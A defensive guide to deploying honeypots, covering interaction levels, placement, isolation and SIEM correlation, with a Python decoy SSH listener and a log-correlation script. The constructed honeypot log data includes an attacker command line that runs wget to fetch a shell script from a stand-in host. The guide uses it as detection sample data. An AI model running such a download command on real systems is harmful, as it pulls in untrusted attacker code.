Guide to Running Effective Honeypots
Taking cyber defense to the next level
A honeypot is a decoy system with no production purpose, which means that any interaction with it is suspicious by definition. It can lure attackers away from the real network and keep them busy, but its main value is as a sensor: it lets you observe the intruder's behaviors and techniques and feed what you learn back into your defensive systems.
Using honeypots is a testament to the organization's maturity: it shows that the basics are in place, that the team has reached a high level of technical skill, and that it is ready for proactive cyber defense.
Why do we need a honeypot
Strictly speaking, we don't. If you manage your security risks effectively and implement the right controls, you can get by without a honeypot, and having one never replaces security defenses and monitoring. What it adds is a high-signal sensor with very few false positives, because no legitimate user has any reason to touch it. I encourage you to at least discuss the idea internally to gauge your organization's readiness for these tools. Engaging in such a project is both fun and promising.
A dynamic honeypot
The level of interaction the honeypot offers is what makes the difference; not all honeypots are equal. To start, you can use what's known as a "low interaction" honeypot, one that only emulates services (a banner, a login prompt, a few canned responses) rather than running them. It is easy to deploy and monitor, and because there is no real service behind it, there is little for an attacker to actually exploit.
Then there is the "high interaction" honeypot. This type runs a full operating system with real services, making it far more likely to be taken for a genuine host and far more informative, but also riskier: a compromised high interaction honeypot is a real foothold unless it is strictly contained.
Both types can be static or dynamic. In most scenarios a static honeypot is what is used: you build it and leave it to do its job, and it stays as it is for weeks or months. A dynamic honeypot, on the other hand, is stood up to reflect a specific threat or vulnerability you want to observe (say, a service targeted by a freshly published exploit). The environment stays in motion: the decoy serves one very specific purpose and is then torn down and replaced by another. Of course, this should all be automated; the CI/CD pipelines you already use for other infrastructure, and increasingly AI-assisted tooling, can drive this kind of deployment.
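To make the "low interaction" idea concrete, here is a minimal decoy SSH listener, written for this article as an added example (it is not code from any of the tools mentioned below). It implements no SSH at all: it sends a version banner, records the client's version line together with the source address, and hangs up. The banner string and the port choice are assumptions for the example; the server binds to an OS-assigned port so it can be run safely on any machine.

```python
import json
import socket
import socketserver
import threading
import time
from datetime import datetime, timezone

# Banner an attacker will see. Mimicking a common real-world string matters,
# because scanners fingerprint services from it. (Assumed value for the example.)
FAKE_BANNER = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.4\r\n"


class BannerHandler(socketserver.BaseRequestHandler):
    """Emulate just enough of an SSH server to capture who is knocking.

    No real protocol handling takes place: we send a version banner, read the
    client's version line, log it, and disconnect. That is the whole attack
    surface, which is what keeps a low-interaction honeypot safe to run.
    """

    def handle(self):
        src_ip, src_port = self.client_address
        self.request.settimeout(5)
        client_line = b""
        try:
            self.request.sendall(FAKE_BANNER)
            client_line = self.request.recv(256)
        except (socket.timeout, OSError):
            pass
        event = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "src_ip": src_ip,
            "src_port": src_port,
            "client_banner": client_line.decode("ascii", "replace").strip(),
        }
        # Any connection at all is worth an alert: nothing legitimate should be here.
        with self.server.lock:
            self.server.events.append(event)
        print(json.dumps(event))


class Honeypot(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, host="127.0.0.1", port=0):
        super().__init__((host, port), BannerHandler)
        self.events = []          # in-memory log; ship this off-host in real use
        self.lock = threading.Lock()


def start_honeypot(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 lets the OS pick one."""
    hp = Honeypot(host, port)
    threading.Thread(target=hp.serve_forever, daemon=True).start()
    return hp


def probe(host, port, payload=b"SSH-2.0-PuTTY_Release_0.78\r\n"):
    """Act as an attacker's scanner: read the banner, send ours, disconnect."""
    with socket.create_connection((host, port), timeout=5) as s:
        banner = s.recv(256)
        s.sendall(payload)
    return banner


def wait_for_events(hp, count, timeout=5.0):
    """Block until the honeypot has logged `count` events or the timeout passes."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        with hp.lock:
            if len(hp.events) >= count:
                return list(hp.events)
        time.sleep(0.05)
    with hp.lock:
        return list(hp.events)


if __name__ == "__main__":
    hp = start_honeypot()
    host, port = hp.server_address
    print(f"decoy SSH listening on {host}:{port}")
    probe(host, port)  # simulate one scanner hit against ourselves
    for e in wait_for_events(hp, 1):
        print("captured:", e)
    hp.shutdown()
```

In practice you would bind to port 22 on a dedicated host, write the JSON events to a file that a log shipper forwards to your SIEM, and never let this process have any privileges beyond the listening socket.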
Tools and techniques for deploying honeypots
When choosing where to deploy a honeypot, most people pick the DMZ, because they feel it is the most exposed to external connections. But this must not limit you. A DMZ honeypot mostly records internet background noise (mass scanners and bots); a honeypot on an internal segment, next to real servers, sees far less traffic, but whatever it does see is someone who is already inside your network, which is exactly what you want to catch. In short, you can put honeypots wherever you want, as long as it is a place you want to keep under your watch.
As for the techniques, there are some general principles to keep in mind:
- Ensure that the honeypot is fully isolated: put it on its own network segment and filter its outbound traffic, so that if it is compromised no lateral movement into the real network is possible and it cannot be used to attack third parties.
- Plan for easy redeployment using virtualized servers or containers, so a compromised or burned honeypot can be rebuilt from a clean image in minutes.
- Closely and continuously monitor the honeypot. Watch for network connections to and from it (any outbound connection it initiates on its own is a red flag) and notice unusual spikes. Collect and analyze the logs it generates, including authentication attempts, commands entered and executables dropped, and ship them off-host so an intruder cannot tamper with them. Feed the data to your threat intelligence system to identify correlations.
Here are some popular tools to use to deploy honeypots, along with their type:
- T-Pot: a multi-honeypot platform that bundles many individual honeypots (Cowrie among them) in Docker containers with dashboards; the bundled honeypots are mostly low to medium interaction
- OpenCanary: low interaction
- Cowrie: medium interaction SSH/Telnet honeypot with an emulated shell; it can also proxy sessions to a real backend for high interaction
- Honeyd: low interaction
The awesome-honeypots project on GitHub provides more honeypot ideas and resources.
Connecting with your cybersecurity ecosystem
Now that the honeypot is running, it's time to use its data to enrich your information security operations. I recommend integrating the honeypot with your Security Information and Event Management (SIEM) system, so that its events become detection content. The key property is that a honeypot produces almost no false positives: every source IP that logs into it, and every credential it tries, is an indicator. For example, if the organization is targeted by a threat actor, take the IP used to break into the honeypot and correlate it across the rest of the network's data; that exposes the same actor's intrusion attempts against production systems, which might otherwise be lost in the noise of ordinary failed logins. Furthermore, you can feed the honeypot data to your threat intelligence platform to build profiles of the actors targeting your organization.
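The correlation just described, and the log collection recommended under the deployment principles above, as an added example written for this article (not code from Cowrie, T-Pot or any SIEM product): honeypot events are turned into indicators and matched against production sshd log lines. The honeypot events are constructed in the shape of Cowrie's JSON log (eventid, src_ip, username, password, input), and the sshd lines and hostnames are made up for the example; in a real deployment the same logic runs as a SIEM rule over the live streams.

```python
import json
import re
from collections import defaultdict

# Constructed honeypot events in the shape of Cowrie's JSON log (one object per line).
# These are made up for the example, not real captures.
HONEYPOT_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.45", "timestamp": "2024-05-01T02:10:03Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.45", "username": "root", "password": "123456", "timestamp": "2024-05-01T02:10:05Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.45", "username": "admin", "password": "admin2024!", "timestamp": "2024-05-01T02:10:09Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.45", "input": "uname -a; wget http://198.51.100.7/x.sh", "timestamp": "2024-05-01T02:10:12Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.22", "username": "pi", "password": "raspberry", "timestamp": "2024-05-01T03:42:51Z"}
"""

# Constructed sshd lines from production hosts, as they would arrive at the SIEM.
PRODUCTION_AUTH_LOG = """\
May  1 02:15:44 web01 sshd[4123]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
May  1 02:15:49 web01 sshd[4123]: Failed password for root from 203.0.113.45 port 51022 ssh2
May  1 02:16:02 db02 sshd[9871]: Accepted publickey for deploy from 10.10.4.8 port 40122 ssh2
May  1 02:31:17 jump01 sshd[2210]: Accepted password for admin from 203.0.113.45 port 51100 ssh2
May  1 04:05:30 web02 sshd[7781]: Failed password for pi from 192.0.2.200 port 33002 ssh2
"""

# Matches the standard OpenSSH "Accepted/Failed <method> for [invalid user] <user> from <ip> port <n>" form.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def extract_indicators(honeypot_log):
    """Turn honeypot events into indicators: attacker IPs and the credentials they tried."""
    ips, creds = set(), set()
    for line in honeypot_log.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ips.add(ev["src_ip"])
        if ev["eventid"] in ("cowrie.login.failed", "cowrie.login.success"):
            creds.add((ev["username"], ev["password"]))
    return ips, creds


def correlate(honeypot_log, auth_log):
    """Find production auth events that involve an IP first seen on the honeypot."""
    ips, creds = extract_indicators(honeypot_log)
    hits = []
    for line in auth_log.splitlines():
        m = SSHD_RE.match(line)
        if not m or m["ip"] not in ips:
            continue
        # A successful login from a honeypot IP is the worst case: the actor who
        # was poking the decoy now has a real session on a production host.
        severity = "critical" if m["result"] == "Accepted" else "high"
        hits.append({
            "host": m["host"], "user": m["user"], "src_ip": m["ip"],
            "result": m["result"], "severity": severity,
            # Same username seen on the honeypot: suggests a credential list in use.
            "tried_on_honeypot": any(u == m["user"] for u, _ in creds),
        })
    return hits


def summarize(hits):
    """Count hits per attacker IP so a SIEM dashboard can rank them."""
    per_ip = defaultdict(lambda: {"failed": 0, "accepted": 0, "hosts": set()})
    for h in hits:
        per_ip[h["src_ip"]]["hosts"].add(h["host"])
        per_ip[h["src_ip"]]["accepted" if h["result"] == "Accepted" else "failed"] += 1
    return {ip: {"failed": v["failed"], "accepted": v["accepted"],
                 "hosts": sorted(v["hosts"])} for ip, v in per_ip.items()}


if __name__ == "__main__":
    hits = correlate(HONEYPOT_LOG, PRODUCTION_AUTH_LOG)
    for h in hits:
        print(json.dumps(h))
    print(json.dumps(summarize(hits), indent=2))
```

With the constructed data, the two failed logins on web01 and the accepted password login on jump01 all trace back to the address that broke into the honeypot, and the jump01 event is flagged critical. The third attacker address in the production log never touched the honeypot, so it is left to the normal brute-force rules; that separation is what keeps honeypot-derived alerts high-signal.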